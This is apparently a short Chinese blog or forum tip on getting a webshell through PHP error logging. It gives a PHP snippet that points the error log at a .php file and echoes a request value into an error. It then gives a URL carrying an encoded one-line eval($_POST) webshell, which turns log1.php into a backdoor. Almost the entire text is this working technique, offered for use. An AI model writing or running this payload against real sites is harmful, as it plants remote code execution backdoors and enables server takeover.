思路呢来源于phpmyadmin,可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取shell,
PHP也是可以开户日志记录的。具体操作如下。
随便找个PHP文件,比如a.php,加上如下代码
<?php
error_reporting(E_ALL);
ini_set("log_errors", "On");
ini_set("error_log","log1.php");
$arr=array();
var_dump($arr[$_REQUEST['x']]);
?>
然后怎么用呢,直接提交
http://www.xxxx.com/a.php?x=<%3fphp+eval(%40%24_POST%5b%27a%27%5d)%3b+%3f>
OK。再根目录下就可以看到log1.php一句话木马文件了。